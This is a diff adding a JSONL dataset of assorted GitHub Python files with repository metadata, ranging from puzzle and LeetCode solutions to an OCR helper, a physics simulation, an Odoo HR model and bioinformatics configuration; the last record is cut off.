diff --git "a/5254.jsonl" "b/5254.jsonl" new file mode 100644--- /dev/null +++ "b/5254.jsonl" @@ -0,0 +1,2188 @@ +{"seq_id":"16522770221","text":"from pprint import pprint\nfinput = '.^^^.^.^^^.^.......^^.^^^^.^^^^..^^^^^.^.^^^..^^.^.^^..^.^..^^...^.^^.^^^...^^.^.^^^..^^^^.....^....'\nrows = list()\nrows.append(finput)\ntotal_rows = int(input('How many rows to generate? '))\ndef flooring(r):\n p = '.'+r[(len(r)-1)]+'.'\n next = list()\n for i,c in enumerate(p[1:101],start=1):\n if p[i-1] == '^' and c == '^' and p[i+1] == '.': next.append('^')\n elif p[i-1] == '.' and c == '^' and p[i+1] == '^': next.append('^')\n elif p[i-1] == '^' and c == '.' and p[i+1] == '.': next.append('^')\n elif p[i-1] == '.' and c == '.' and p[i+1] == '^': next.append('^')\n #if p[i-1] == '' and c == '' and p[i+1] == '':\n else: next.append('.')\n r.append(''.join(next))\ndef rowcount(r):\n return r.count('.') \nwhile len(rows) < total_rows:\n flooring(rows)\nprint(sum(map(rowcount, rows)))\n","repo_name":"drdaley/AoC2016","sub_path":"d18_p1.py","file_name":"d18_p1.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12891235248","text":"from typing import List\n\n\nclass Solution:\n def countNegatives(self, grid: List[List[int]]) -> int:\n r = cols = len(grid[0])\n ans = 0\n for row in grid:\n l = 0\n while l < r:\n m = (l + r) // 2\n if row[m] < 0:\n r = m\n else:\n l = m + 1\n ans += cols - r\n return ans\n\n\nclass Solution1:\n def countNegatives(self, grid: List[List[int]]) -> int:\n j = m = len(grid[0]) - 1\n ans = 0\n for row in grid:\n while j >= 0 and row[j] < 0:\n j -= 1\n ans += m - j\n return ans\n\n\nclass Solution2:\n def countNegatives(self, grid: List[List[int]]) -> int:\n h = len(grid)\n w = len(grid[0])\n res = 0\n for i in range(h):\n j = w\n while j > 0 and grid[i][j - 1] < 0:\n j -= 1\n res += (w - j) * (h - i)\n w = j\n if not w:\n break\n return res\n\n\ndef test():\n sol = Solution()\n\n print('Test 1... ', end='')\n assert sol.countNegatives(grid=[[4, 3, 2, -1], [3, 2, 1, -1], [1, 1, -1, -2], [-1, -1, -2, -3]]) == 8\n print('OK')\n\n print('Test 2... ', end='')\n assert sol.countNegatives(grid=[[3, 2], [1, 0]]) == 0\n print('OK')\n\n\nif __name__ == '__main__':\n test()\n","repo_name":"Vskesha/leetcode_solutions","sub_path":"leetcode_solutions/p1351_count_negative_numbers_in_a_sorted_matrix.py","file_name":"p1351_count_negative_numbers_in_a_sorted_matrix.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"31780926284","text":"# from pyglet.media import Source, Player, load\n\n# player = Player()\n# source = load('crowd-cheering.mp3')\n# player.queue(source)\n# player.play()\n# while True:\n# input('Press any key to exit')\n# break\n\nfrom youtube_dl import YoutubeDL\n\noptions = {\n 'default_search': 'ytsearch5'\n}\n\nydl = YoutubeDL(options)\nsearch_result = ydl.extract_info('that girl', False)\nprint(search_result)","repo_name":"phanhr/c4t-20","sub_path":"finalhack/playmusic.py","file_name":"playmusic.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9129808248","text":"# encoding=utf-8\n\nimport os\n\n\ndef deleteFiles(dirName):\n for root, dirs, files in os.walk(unicode(dirName, 'utf-8')):\n for theFile in files:\n if theFile.endswith('.doc'):\n os.remove(os.path.join(root, theFile))\n print('删除成功')\n\n\nif \"__main__\" == __name__:\n deleteFiles(raw_input('请输入文件夹:'))\n","repo_name":"qianyue0317/python27pro","sub_path":"aboutWord/deleteAssignFile.py","file_name":"deleteAssignFile.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71311250173","text":"from io import StringIO\nimport re\n\nprint(\n \"\"\"Welcome to your Madlib Game! You will be provided with a series of prompts to enter a word that satisfies the requested word type. After you've answered all the promps, we'll use your words in a special story for you.\n\nJust a reminder:\n- adjectives are descriptive words\n- names should be a capitalized first name\n- nouns are people, places, and things\n- plural nouns are more than one of a noun\n- verbs are action words\n- past tense verbs are actions that took place in the past\n\nHere we go!\n\"\"\"\n)\n\n\ndef read_template(path):\n with open(path) as text:\n contents = text.read()\n stripped_contents = contents.strip()\n return stripped_contents\n\n\ndef parse_template(text):\n new = tuple(re.findall(r\"\\{(.*?)\\}\", text))\n length = len(new)\n for i in range(0, length):\n if i == 0:\n print(i)\n new_text = text.replace(new[i], \"\")\n else:\n new_text = new_text.replace(new[i], \"\")\n return new_text, new\n\n\ndef user_prompt(words):\n print(\"Please type a response to the prompt and press [ENTER]\")\n responses = []\n for word in words:\n responses.append(input(f\"Type (a/an) {word}: \"))\n return responses\n\n\ndef merge(strip, res):\n length = len(res)\n for i in range(0, length):\n if i == 0:\n story = strip.replace(\"{}\", res[i], 1)\n else:\n story = story.replace(\"{}\", res[i], 1)\n return story\n\n\ndef output():\n stripped, prompts = parse_template(read_template(\"assets/game_template.txt\"))\n\n res = user_prompt(prompts)\n f = open(\"assets/madlib.txt\", \"w\")\n f.write(merge(stripped, res))\n f.close()\n print(merge(stripped, res))\n\n\noutput()\n\n\n# Following is working code...\n\n# \"\"\"Mad Libs\"\"\"\n# \"\"\"Mad Lib Intro\"\"\"\n\n# STORY = \"I the %s and %s %s have %s %s's %s sister and plan to steal her %s %s! What are a %s and backpacking %s to do? Before you can help %s, you'll have to collect the %s %s and %s %s that open up the %s worlds connected to A %s Lair. There are %s %s and %s %s in the game, along with hundreds of other goodies for you to find.\"\n\n# print(\n# \"\"\"Welcome to this Madlib story. You will be provided with a series of prompts to enter a word that satisfies the requested word type. After you've answered all the promps, we'll use your words in a special story for you.\n\n# Just a reminder:\n# - adjectives are descriptive words\n# - names should be a capitalized first name\n# - nouns are people, places, and things\n# - plural nouns are more than one of a noun\n# - verbs are action words\n# - past tense verbs are actions that took place in the past\n\n# Here we go!\n# \"\"\"\n# )\n# print()\n\n# adjective1 = input(\"Write an adjective: \")\n# adjective2 = input(\"Write an adjective: \")\n# fName1 = input(\"Enter a first name: \")\n# pastTenseVerb = input(\"Input a verb: \")\n# fName2 = input(\"Enter a first name: \")\n# adjective3 = input(\"Write an adjective: \")\n# adjective4 = input(\"Write an adjective: \")\n# pluralNoun1 = input(\"Input a plural noun: \")\n# largeAnimal = input(\"A large animial: \")\n# smallAnimal = input(\"A small animial: \")\n# girlName = input(\"Enter a girl's name: \")\n# adjective5 = input(\"Write an adjective: \")\n# pluralNoun2 = input(\"Input a plural noun: \")\n# adjective6 = input(\"Write an adjective: \")\n# pluralNoun3 = input(\"Input a plural noun: \")\n# number50 = input(\"Input a number between 1 and 50: \")\n# fName3 = input(\"Enter a first name: \")\n# number1 = input(\"Input a number: \")\n# pluralNoun4 = input(\"Input a plural noun: \")\n# number2 = input(\"Input a number: \")\n# pluralNoun5 = input(\"Input a plural noun: \")\n\n# print()\n# print(\n# STORY\n# % (\n# adjective1,\n# adjective2,\n# fName1,\n# pastTenseVerb,\n# fName2,\n# adjective1,\n# adjective2,\n# pluralNoun1,\n# largeAnimal,\n# smallAnimal,\n# girlName,\n# adjective3,\n# pluralNoun2,\n# adjective4,\n# pluralNoun3,\n# number50,\n# fName3,\n# number1,\n# pluralNoun4,\n# number2,\n# pluralNoun5,\n# )\n# )\n","repo_name":"kevinhenry/madlib-cli","sub_path":"madlib_cli/madlib.py","file_name":"madlib.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"30920476048","text":"import orthopy\n\nfrom ..tools import scheme_from_rc\nfrom ._helpers import LineSegmentScheme\n\n\ndef gauss_jacobi(n, alpha, beta, mode=\"numpy\"):\n degree = 2 * n - 1\n\n _, _, a, b = orthopy.line_segment.recurrence_coefficients.jacobi(\n n, alpha, beta, \"monic\", symbolic=True\n )\n points, weights = scheme_from_rc(a, b, mode=mode)\n return LineSegmentScheme(\"Gauss-Jacobi\", degree, weights, points)\n","repo_name":"LJPapenfort/quadpy","sub_path":"quadpy/line_segment/_gauss_jacobi.py","file_name":"_gauss_jacobi.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"33198316942","text":"import xml.etree.ElementTree as ET\n\nimport sys\nsys.path.append(\"../../\")\nfrom helper import *\n\nroot = xmlRoot(\"AN2015-1-FR42.xml\", encoding=\"iso-8859-1\")\nfor elem in root:\n Code = elem.find(\"Code\").text\n \n ValidFromQuarter, _ = quarterToInteger(elem, \"Geldig_vanaf\", \"Geldig_tot\")\n\n ID = ET.Element(\"Id\")\n ID.text = Code + \"-\" + ValidFromQuarter\n\n elem.append(ID)\n\noutfile = \"Adjusted_AN2015-1-FR42.xml\"\ntree = ET.ElementTree(root)\ntree.write(outfile, encoding=\"utf-8\")\n","repo_name":"chrdebru/dmfa_pub","sub_path":"Annexes/Annex42/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10720211629","text":"from numpy import *\ndef loadDataSet(fileName):\n dataMat=[]\n fr=open(fileName)\n for line in fr.readlines():\n curLine=line.strip().split('\\t')\n fltLine=array(curLine).astype(float)\n dataMat.append(fltLine)\n return mat(dataMat)\n\ndef distEclud(vecA,vecB):\n return sqrt(sum(power(vecA-vecB,2)))\n\ndef randCent(dataSet,k):\n n=shape(dataSet)[1]\n # centroids k个质心\n centroids=mat(zeros((k,n)))\n for j in range(n):\n minJ=min(dataSet[:,j])\n rangeJ=float(max(dataSet[:,j])-minJ)\n # dataSet矩阵中每一列最小值 加上一个范围 产生的k个点不超过dataSet\n centroids[:,j]=minJ+rangeJ*random.rand(k,1)\n return centroids\n\ndef KMeans(dataSet,k,distMeas=distEclud,createCent=randCent):\n m=shape(dataSet)[0]\n clusterAssment=mat(zeros((m,2)))\n centroids=createCent(dataSet,k)\n clusterChanged=True\n while clusterChanged:\n clusterChanged=False\n for i in range(m):\n minDist=inf;\n minIndex=-1\n for j in range(k):\n distJI=distMeas(centroids[j,:],dataSet[i,:])\n if distJI=0:\n dp[t]|=dp[t-time[i]]\nans=0\nfor i in range(sumtime//2+1):\n if dp[i]:\n ans=i\nprint(sumtime-ans)\n\n\"\"\"\nN=int(input())\ntime=list(map(int,input().split()))\n\nans=sum(time)\nhalf=ans-(ans//2)\n\nfor i in range(1,2**N-1):\n T=0\n for j in range(N):\n if (i>>j)%2:\n T+=time[j]\n if T>=half:\n if T imghdr:\n \"\"\"\n Given an image, returns the same image with all the ASCII characters boxed\n\n Parameters:\n img the original image\n Returns:\n image the same image with characters boxed\n \"\"\"\n dimensions = img.shape\n #con = r'--oem 3 --psm 6 outputbase characters'\n boxes = tes.image_to_boxes(img)#, config=con)\n for b in boxes.splitlines():\n b = b.split(\" \")\n x,y,w,h = int(b[1]),int(b[2]),int(b[3]),int(b[4])\n cv.rectangle(img, (x, dimensions[0]-y), (w, dimensions[0]-h), (100,100,225), 1)\n cv.putText(img, b[0], (x, dimensions[0]-y+15), cv.FONT_HERSHEY_COMPLEX_SMALL,0.75,(50,50,225),1)\n \n return img\n\n def boxWords(self, img: imghdr) -> imghdr:\n \"\"\"\n Given an image, returns the same image with all ASCII words boxed\n\n Parameters:\n img the original image\n Returns:\n image the same image with words boxed\n \"\"\"\n #con = r'--oem 3 --psm 6 outputbase characters'\n boxes = tes.image_to_data(img)#, config=con)\n for i,b in enumerate(boxes.splitlines()):\n if i != 0:\n b = b.split()\n if len(b) == 12 and float(b[10]) > 50:\n x,y,w,h = int(b[6]),int(b[7]),int(b[8]),int(b[9])\n cv.rectangle(img, (x, y), (w+x, h+y), (100,100,225), 1)\n cv.putText(img, self.roundWord(b[10]) + \": \" + b[11], (x, y), cv.FONT_HERSHEY_COMPLEX_SMALL, 0.6,(50,50,225), 1)\n return img\n\n def roundWord(self, word: str) -> int:\n \"\"\"\n Given string that represents a float, returns the rounded number as an int\n\n Parameters:\n word a string of a float\n Returns:\n integer the rounded value of the float\n \"\"\"\n return str(round(float(word), 2))\n\nif __name__ == \"__main__\":\n # Waits for user to specify image or video\n type_input = input(\"Please specify if you are providing an image or video (write 'Image' or 'Video'): \")\n if type_input == \"Image\":\n # Waits for user to specify path to image\n path_input = input(\"Please specify the path to your image: \")\n try:\n my_ocr = OCR()\n my_ocr.stillImage(path_input)\n except Exception as e:\n print(e)\n elif type_input == \"Video\":\n # Waits for user to specify path to video\n path_input = input(\"Please specify the path to your video: \")\n try: \n my_ocr = OCR()\n my_ocr.videoImage(path_input)\n except Exception as e: \n print(e)\n else:\n print(\"Improper input\")","repo_name":"earth15354/AIT-Internship","sub_path":"OCR.py","file_name":"OCR.py","file_ext":"py","file_size_in_byte":5316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10007337423","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n# https://physics.stackexchange.com/a/134863\n\n# Physical constants\nG = 9.81 # acceleration due to gravity (m/s^2)\n\nr = 0.05 # projectile radius (m)\nm = 0.2 # mass (kg)\n\nCd = 0.47 # drag coefficient of a sphere\nA = np.pi * r ** 2 # area (m^2)\nrho_air = 1.205 # Air density (kg.m-3) @ NTP\nrho_hydrogen = 0.0899 # Air density (kg.m-3) @ STP\n\n\ndef run_demo():\n # Initial speed and launch angle (from the horizontal).\n launch_angle = 65 # deg\n launch_velocity = 50 # m/s\n launch_height = 1 # m\n\n run_projectile_resistance_demo(launch_angle, launch_velocity, launch_height)\n\n\ndef run_projectile_resistance_demo(launch_angle, v0, h):\n phi0 = np.radians(launch_angle)\n\n # Initial conditions\n x0 = 0\n y0 = h\n Vx0 = v0 * np.cos(phi0)\n Vy0 = v0 * np.sin(phi0)\n\n # Interval of integration by iteration up to tf\n steps = 1000\n tf = (Vy0 + np.sqrt(Vy0 ** 2 + 2 * G * h)) / G # time of flight\n dt = tf / steps\n\n # No drag ----------------------------------------------------------------------------------------------------------\n X_ND = list()\n Y_ND = list()\n\n for t in range(steps + 1):\n X_ND.append(x0 + Vx0 * dt * t)\n Y_ND.append(y0 + Vy0 * dt * t - 0.5 * G * (dt * t) ** 2)\n\n # With drag --------------------------------------------------------------------------------------------------------\n X_WD = list()\n Y_WD = list()\n\n for loop, rho in enumerate([rho_hydrogen, rho_air]):\n sol = iterative((x0, y0, Vx0, Vy0), dt, steps, rho)\n\n # Retrieve the solution and append\n X_WD.append(sol[0])\n Y_WD.append(sol[1])\n tof = sol[4]\n ttm = sol[5]\n\n print(f'Time to target = {tof} s')\n print(f'Time to highest point = {ttm} s')\n print(f'Range to target, xmax = {X_WD[-1]} m')\n print(f'Maximum height, zmax = {max(Y_WD[loop])} m')\n\n # Plot results\n x = [X_ND] + X_WD\n y = [Y_ND] + Y_WD\n\n plot(x, y)\n\n\ndef iterative(u0, dt, steps, rho):\n x0, y0, Vx0, Vy0 = u0\n\n x_list = list()\n y_list = list()\n Vx_list = list()\n Vy_list = list()\n\n x_list.append(x0)\n y_list.append(y0)\n Vx_list.append(Vx0)\n Vy_list.append(Vy0)\n\n # Interval of integration by ODE method up to tf -------------------------------------------------------------------\n stop = 0 # stop condition flag to end for loop\n tof = 0 # time of flight\n ttm = 0 # time to max\n last_smallest_Vy = 1e05\n\n # Initial conditions -------------------------------------------------------------------------------------------\n x, y, Vx, Vy = x0, y0, Vx0, Vy0\n\n for t in range(1, steps + 1):\n if stop != 1:\n u = x, y, Vx, Vy\n\n # log data -------------------------------------------------------------------------------------------------\n Vx, Vy, ax, ay = deriv(t, u, rho)\n\n # increment state by dt ------------------------------------------------------------------------------------\n # position\n x += Vx * dt\n y += Vy * dt\n\n # velocity\n Vx += ax * dt\n Vy += ay * dt\n\n t += t * dt\n\n # log data -------------------------------------------------------------------------------------------------\n x_list.append(x)\n y_list.append(y)\n\n Vx_list.append(Vx)\n Vy_list.append(Vy)\n\n # log event - reached highest point why Vy=0 (note: discrete dt step misses 0.0)\n if np.abs(Vy) < last_smallest_Vy:\n last_smallest_Vy = Vy\n ttm = t * dt\n\n # stop event - hit target\n if y <= 0.0:\n tof = t * dt\n stop = 1\n\n return x_list, y_list, Vx_list, Vy_list, tof, ttm\n\n\ndef deriv(t, u, rho):\n x, y, Vx, Vy = u\n k = 0.5 * Cd * rho * A # convenience constant\n\n Vxy = np.hypot(Vx, Vy)\n ax = -k / m * Vxy * Vx # acceleration in x direction\n ay = -k / m * Vxy * Vy - G # acceleration in y direction\n return Vx, Vy, ax, ay\n\n\ndef plot(x, y):\n fig, ax1 = plt.subplots(figsize=(10, 5))\n if isinstance(x[0], list):\n for i in range(len(x)):\n plt.plot(x[i], y[i], label='id %s' % i)\n else:\n plt.plot(x, y)\n\n ax1.set_title('Projectile Demo with air resistance')\n ax1.set_xlabel('distance (m)')\n ax1.set_ylabel('height (m)')\n ax1.legend(['$\\\\rho=0.0$ (vacuum)', f'$\\\\rho={rho_hydrogen}$ (hydrogen)', f'$\\\\rho={rho_air}$ (air)'])\n\n plt.grid()\n plt.show()\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n run_demo()\n","repo_name":"Tektronica/projectile_demos","sub_path":"demo_05a_projectile_resistance_iterative.py","file_name":"demo_05a_projectile_resistance_iterative.py","file_ext":"py","file_size_in_byte":4677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10268181277","text":"# -*- coding: utf-8 -*-\n# © <2017> \n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).\n\nfrom datetime import datetime\nimport logging\nimport uuid\n\nfrom openerp import fields, models, api\nfrom odoo.exceptions import UserError\n\n_logger = logging.getLogger(__name__)\n\nclass hr_leave_request(models.Model):\n _name = 'hr.leave.request'\n _description = 'HR LEAVE REQUEST'\n\n name = fields.Char(\n string='ID'\n )\n worker_request = fields.Boolean(\n string='Otro empleado',\n default=False\n )\n worker_id = fields.Many2one(\n string='Empleado',\n comodel_name='hr.employee'\n )\n worker_company_id = fields.Many2one(\n string='Empresa',\n comodel_name='res.company',\n related='worker_id.company_id'\n )\n employee_id = fields.Many2one(\n string='Empleado',\n comodel_name='hr.employee',\n default=lambda self: self._current_employee_id()\n )\n company_id = fields.Many2one(\n string='Empresa',\n comodel_name='res.company',\n related='employee_id.company_id'\n )\n from_time = fields.Datetime(\n string='Entrada'\n )\n to_time = fields.Datetime(\n string='Salida'\n )\n paid = fields.Boolean(\n string='Permiso pagado'\n )\n check_id = fields.Many2one(\n string='Autoriza',\n comodel_name='res.users'\n )\n check_user = fields.Boolean(\n string='Revisor',\n compute=lambda self: self._compute_check_user()\n )\n access_token = fields.Char(\n string='Token',\n size=50\n )\n ltype = fields.Selection(\n string='Tipo',\n required=True,\n default='01',\n size=2,\n selection=[\n ('01', 'Entrar tarde'),\n ('02', 'Salir temprano'),\n ('03', 'Salir y regresar'),\n ('04', 'Todo el día')\n ]\n )\n leave_day = fields.Date(\n string='Día'\n )\n description = fields.Text(\n string='Descripción'\n )\n state = fields.Selection(\n string='Estado',\n default='NEW',\n size=4,\n selection=[\n ('NEW', 'Creada'),\n ('SEND', 'Enviada'),\n ('OK', 'Autorizada'),\n ('REJ', 'Rechazada'),\n ]\n )\n sync_state = fields.Selection(\n string='Sincronización',\n default='OK',\n size=4,\n index=True,\n selection=[\n ('SYNC', 'Sincronizar'),\n ('OK', 'Sincronizado')\n ]\n )\n\n\n @api.model\n def create(self, vals):\n\n if 'from_time' not in vals.keys() or 'to_time' not in vals.keys():\n raise UserError('No es posible crear la solicitud')\n\n rec = super(hr_leave_request, self).create(vals)\n\n rec.sudo().write({\n 'name': 'LR-%s' % str(rec.id).zfill(6)\n })\n\n return rec\n\n def _current_employee_id(self):\n\n employee = self.env['hr.employee'].search([('user_id', '=', self.env.uid)], limit=1)\n\n if not employee.id:\n raise UserError('No es posible crear solicitudes, contacte al departamento de Soporte técnico')\n\n if not employee.boss_id and not employee.coach_id:\n raise UserError('No es posible crear solicitudes, contacte al departamento de RH - Nómina')\n\n return employee.id\n\n def _compute_check_user(self):\n\n for item in self:\n item.check_user = self.env.uid == self.check_id.id and self.state == 'SEND'\n\n @api.multi\n def action_send(self):\n\n check_employee = self.employee_id.boss_id or self.employee_id.coach_id\n\n if not check_employee:\n raise UserError('No es posible enviar la solicitud, contacte al departamento de RH - Nómina')\n\n if not check_employee.user_id:\n raise UserError('La persona que autoriza sus solicitudes no cuenta con un usuario asociado al empleado, contacte al departamento de RH - Nómina')\n\n self.check_id = check_employee.user_id.id\n self.state = 'SEND'\n self.access_token = str(uuid.uuid4()).replace('-','')\n\n template = self.env.ref('hr_paysheet.pending_approve_leave_notify_template')\n self.env['mail.template'].browse(template.id).sudo().send_mail(self.id, force_send=True)\n\n @api.multi\n def action_approve(self):\n self.action_check('OK')\n self.sudo().sync_state = 'SYNC'\n\n @api.multi\n def action_direct_approve(self):\n self.action_check('OK')\n self.sudo().sync_state = 'SYNC'\n\n @api.multi\n def action_decline(self):\n self.action_check('REJ')\n\n def action_check(self, _state):\n\n self.sudo().state = _state\n\n template = self.env.ref('hr_paysheet.leave_request_result_notify_template')\n template.sudo().send_mail(self.id, force_send=True)","repo_name":"cardona18/ifaco","sub_path":"hr_paysheet/models/hr_leave_request.py","file_name":"hr_leave_request.py","file_ext":"py","file_size_in_byte":4831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73471793852","text":"# Import the necessary libraries and modules\nimport pandas as pd # For saving the prediction and the recommendation in a tabular format\nimport geopandas as gpd # For saving the prediction and the recommendation in a spatial format\nimport sqlite3 # For saving the prediction and the recommendation in a relational database\nimport pymongo # For saving the prediction and the recommendation in a non-relational database\nimport tkinter as tk # For creating the file dialog\nimport tkinter.filedialog as fd # For creating the file dialog\n\n# Define the saver function that saves the prediction and the recommendation\ndef saver(prediction, recommendation, pred_rec_type):\n # Create a file dialog to select the file name and location\n file_name = fd.asksaveasfilename(title=\"Save Prediction and Recommendation\")\n\n # Check if the file name is valid\n if file_name:\n # Save the prediction and the recommendation in a file according to the file extension\n if file_name.endswith(\".csv\"):\n # Save the prediction and the recommendation in a csv file\n # Convert the prediction and the recommendation into data frames\n prediction_df = pd.DataFrame(prediction, columns=[\"Yield\", \"Quality\"])\n recommendation_df = pd.DataFrame(recommendation, columns=[\"Action\", \"Intervention\"])\n # Concatenate the prediction and the recommendation data frames\n pred_rec_df = pd.concat([prediction_df, recommendation_df], axis=1)\n # Write the prediction and the recommendation data frame to a csv file\n pred_rec_df.to_csv(file_name, index=False)\n\n elif file_name.endswith(\".json\"):\n # Save the prediction and the recommendation in a json file\n # Convert the prediction and the recommendation into data frames\n prediction_df = pd.DataFrame(prediction, columns=[\"Yield\", \"Quality\"])\n recommendation_df = pd.DataFrame(recommendation, columns=[\"Action\", \"Intervention\"])\n # Concatenate the prediction and the recommendation data frames\n pred_rec_df = pd.concat([prediction_df, recommendation_df], axis=1)\n # Write the prediction and the recommendation data frame to a json file\n pred_rec_df.to_json(file_name, orient=\"records\")\n\n elif file_name.endswith(\".xlsx\"):\n # Save the prediction and the recommendation in an excel file\n # Convert the prediction and the recommendation into data frames\n prediction_df = pd.DataFrame(prediction, columns=[\"Yield\", \"Quality\"])\n recommendation_df = pd.DataFrame(recommendation, columns=[\"Action\", \"Intervention\"])\n # Create a writer object for the excel file\n writer = pd.ExcelWriter(file_name, engine=\"xlsxwriter\")\n # Write the prediction and the recommendation data frames to separate sheets in the excel file\n prediction_df.to_excel(writer, sheet_name=\"Prediction\", index=False)\n recommendation_df.to_excel(writer, sheet_name=\"Recommendation\", index=False)\n # Save the excel file\n writer.save()\n\n elif file_name.endswith(\".shp\"):\n # Save the prediction and the recommendation in a shapefile\n # Convert the prediction and the recommendation into geo data frames\n prediction_gdf = gpd.GeoDataFrame(prediction, columns=[\"Yield\", \"Quality\", \"geometry\"])\n recommendation_gdf = gpd.GeoDataFrame(recommendation, columns=[\"Action\", \"Intervention\", \"geometry\"])\n # Overlay the prediction and the recommendation geo data frames\n pred_rec_gdf = gpd.overlay(prediction_gdf, recommendation_gdf, how=\"intersection\")\n # Write the prediction and the recommendation geo data frame to a shapefile\n pred_rec_gdf.to_file(file_name)\n\n else:\n # Raise an exception if the file extension is invalid\n raise ValueError(f\"Invalid file extension: {file_name}\")\n\n # Save the prediction and the recommendation in a database according to the user's choice\n # Ask the user if they want to save the prediction and the recommendation in a database\n db_choice = tk.messagebox.askyesno(title=\"Save Prediction and Recommendation in Database\", message=\"Do you want to save the prediction and recommendation in a database?\")\n\n # Check if the user's choice is yes\n if db_choice:\n # Ask the user to choose the type of database\n db_type = tk.simpledialog.askstring(title=\"Choose Database Type\", prompt=\"Please choose the type of database: sqlite or mongodb\")\n\n # Check the type of database\n if db_type == \"sqlite\":\n # Save the prediction and the recommendation in a sqlite database\n # Create a connection to the sqlite database\n conn = sqlite3.connect(\"pred_rec.db\")\n # Create a cursor object\n cur = conn.cursor()\n # Create a table for the prediction and the recommendation\n cur.execute(\"\"\"CREATE TABLE IF NOT EXISTS pred_rec (\n id INTEGER PRIMARY KEY,\n yield REAL,\n quality INTEGER,\n action TEXT,\n intervention TEXT\n )\"\"\")\n # Insert the prediction and the recommendation into the table\n for i in range(len(prediction)):\n cur.execute(\"\"\"INSERT INTO pred_rec (yield, quality, action, intervention) VALUES (?, ?, ?, ?)\"\"\",\n (prediction[i][0], prediction[i][1], recommendation[i][0], recommendation[i][1]))\n # Save the changes to the database\n conn.commit()\n # Close the connection to the database\n conn.close()\n\n elif db_type == \"mongodb\":\n # Save the prediction and the recommendation in a mongodb database\n # Create a connection to the mongodb database\n client = pymongo.MongoClient(\"mongodb://localhost:27017/\")\n # Create a database for the prediction and the recommendation\n db = client[\"pred_rec\"]\n # Create a collection for the prediction and the recommendation\n col = db[\"pred_rec\"]\n # Insert the prediction and the recommendation into the collection\n for i in range(len(prediction)):\n col.insert_one({\n \"yield\": prediction[i][0],\n \"quality\": prediction[i][1],\n \"action\": recommendation[i][0],\n \"intervention\": recommendation[i][1]\n })\n # Close the connection to the database\n client.close()\n\n else:\n # Raise an exception if the type of database is invalid\n raise ValueError(f\"Invalid type of database: {db_type}\")\n else:\n # Raise an exception if the file name is invalid\n raise FileNotFoundError(f\"No file selected\")\n","repo_name":"King-Debo/Crop-Yield-and-Quality-Predictor-and-Improver","sub_path":"saver.py","file_name":"saver.py","file_ext":"py","file_size_in_byte":7130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40092125130","text":"import cv2\nimport csv\nimport time\n\n\ndef save_snapshot(result_img, data):\n timestamp = time.strftime(\"%d-%m-%Y-%H-%M-%S\")\n image_path = f\"frame-{timestamp}.jpg\"\n csv_path = f\"output-{timestamp}.csv\"\n\n cv2.imwrite(image_path, cv2.cvtColor(result_img, cv2.COLOR_RGB2BGR))\n\n with open(csv_path, 'w', newline='') as f:\n writer = csv.writer(f)\n writer.writerow([\"Gender\", \"Age\"])\n writer.writerows(data)\n\n print(\"Snapshot saved:\", image_path)\n print(\"CSV file saved:\", csv_path)\n print(\"Timestamp:\", timestamp)\n","repo_name":"kimyeonsooo/opensourceBasic","sub_path":"save_snapshot.py","file_name":"save_snapshot.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18976913705","text":"import pydnameth as pdm\nfrom scripts.develop.routines import *\nfrom tqdm import tqdm\nimport numpy as np\nfrom scipy.stats import pearsonr, pointbiserialr\nfrom statsmodels.stats.multitest import multipletests\nfrom paper.routines.infrastructure.save.table import save_table_dict_xlsx\n\nsave_path = 'E:/YandexDisk/Work/pydnameth/unn_epic/comparison'\n\ndata_unn_epic = pdm.Data(\n path='',\n base='unn_epic'\n)\nannotations_unn_epic = pdm.Annotations(\n name='annotations',\n type='850k',\n exclude='bad_cpgs_from_ChAMP',\n select_dict={\n 'CHR': ['-X', '-Y']\n }\n)\ntarget_unn_epic = 'Age'\nobservables_unn_epic = pdm.Observables(\n name='observables',\n types={}\n)\ncells_unn_epic = pdm.Cells(\n name='cell_counts_horvath_filtered_normalized',\n types='any'\n)\nattributes_unn_epic = pdm.Attributes(\n target=target_unn_epic,\n observables=observables_unn_epic,\n cells=cells_unn_epic\n)\ndata_params_unn_epic = get_data_params(data_unn_epic.base)\n# data_params_unn_epic = {\n# 'norm': 'BMIQ',\n# 'part': 'raw',\n# }\nconfig_unn = pdm.load_beta_config(\n data_unn_epic,\n annotations_unn_epic,\n attributes_unn_epic,\n data_params=data_params_unn_epic\n)\n\n\n\n\ndata_other = pdm.Data(\n path='',\n base='GSE87571'\n)\nannotations_other = pdm.Annotations(\n name='annotations',\n type='450k',\n exclude='bad_cpgs',\n select_dict={\n 'CHR': ['-X', '-Y']\n }\n)\ntarget_other = get_target(data_other.base)\nobservables_other = pdm.Observables(\n name='observables',\n types={}\n)\ncells_other = pdm.Cells(\n name='cells_horvath_calculator',\n types='any'\n)\nattributes_other = pdm.Attributes(\n target=target_other,\n observables=observables_other,\n cells=cells_other\n)\ndata_params_other = get_data_params(data_other.base)\nconfig_other = pdm.load_beta_config(\n data_other,\n annotations_other,\n attributes_other,\n 